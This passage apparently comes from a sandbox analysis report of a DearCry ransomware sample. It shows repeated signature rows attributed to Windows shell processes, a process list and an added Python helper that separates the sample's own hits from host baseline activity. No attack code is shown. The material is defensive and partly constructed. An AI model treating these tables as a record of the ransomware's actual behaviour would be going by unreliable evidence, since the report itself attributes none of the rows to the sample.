Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

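Every row in the signature tables above names explorer.exe, StartMenuExperienceHost.exe or SearchApp.exe as the acting process; these are Windows shell components that run in the sandbox whatever is detonated, and none of the rows is attributed to the sample itself. The Python helper below is an added example (not part of this report and not code from the sandbox that produced it): it parses the flattened "Description Indicator Process Target" rows, counts hits per signature and per process image, collects the privileges each image enabled, and lists the signatures that have no row attributed to the submitted sample. It assumes the row layout used here, in particular that process paths contain no spaces (true for every row in this report, not for a binary under C:\Program Files); the embedded excerpt is a constructed subset of rows copied from the tables above, and the sample path is the one shown under Processes.

```python
"""Attribute sandbox signature hits to the submitted sample versus host processes.

Added triage helper, not part of the original report or the sandbox's own code.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, List, Set

HEADER = "Description Indicator Process Target"

# A row is: <description> <indicator, may contain spaces> <process path> <target>.
# Assumption: the process path contains no spaces (true for every row in this
# report), so it can be anchored as a drive letter followed by non-space characters.
ROW = re.compile(
    r"^(?P<description>Key created|Set value \((?:data|str|int)\)|Token: \S+|N/A)\s+"
    r"(?P<indicator>.*?)\s+"
    r"(?P<process>[A-Za-z]:\\\S+)\s+"
    r"(?P<target>\S+)$"
)

# Path of the detonated sample, as listed under Processes in this report.
SAMPLE_PATH = r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

# Constructed excerpt: a subset of rows copied from the signature tables above.
SAMPLE_REPORT = r"""
Modifies registry class
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken
Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx
Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
"""


def parse_signatures(text: str) -> List[Dict[str, str]]:
    """Return one dict per table row, tagged with the signature heading above it."""
    events: List[Dict[str, str]] = []
    signature = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == HEADER:
            continue
        m = ROW.match(line)
        if m is None:
            signature = line  # any non-row, non-header line is a signature heading
            continue
        row = m.groupdict()
        row["signature"] = signature
        row["image"] = row["process"].rsplit("\\", 1)[-1]  # file name of the process
        events.append(row)
    return events


def hits_by_signature(events: List[Dict[str, str]]) -> Dict[str, Counter]:
    """Count, per signature, how many rows each process image produced."""
    out: Dict[str, Counter] = defaultdict(Counter)
    for e in events:
        out[e["signature"]][e["image"]] += 1
    return dict(out)


def privileges_by_image(events: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Collect the privileges each image enabled, from the 'Token: ...' rows."""
    out: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        if e["description"].startswith("Token: "):
            out[e["image"]].add(e["description"][len("Token: "):])
    return dict(out)


def attribute_to_sample(events: List[Dict[str, str]], sample_path: str) -> Dict[str, object]:
    """Split hits by whether the acting process is the submitted sample.

    Signatures listed under 'not_from_sample' have no row raised by the sample:
    they record host activity captured during detonation, not the sample's behaviour.
    """
    sample_hits, other_hits = Counter(), Counter()
    for e in events:
        bucket = sample_hits if e["process"].lower() == sample_path.lower() else other_hits
        bucket[e["signature"]] += 1
    signatures = {e["signature"] for e in events}
    return {
        "from_sample": dict(sample_hits),
        "from_other": dict(other_hits),
        "not_from_sample": sorted(s for s in signatures if s not in sample_hits),
    }


if __name__ == "__main__":
    evs = parse_signatures(SAMPLE_REPORT)
    for sig, counts in hits_by_signature(evs).items():
        print(f"{sig}: {dict(counts)}")
    print("privileges:", privileges_by_image(evs))
    print("attribution:", attribute_to_sample(evs, SAMPLE_PATH))
```

Run over the full report text instead of the excerpt, the 'not_from_sample' list tells the analyst which signature hits are sandbox baseline (shell processes touching MuiCache, BagMRU, DOMStorage and enabling SeShutdownPrivilege) and should not be scored against the sample; the stronger check is to diff the same tables against a detonation of a known-benign file on the same image.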
Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

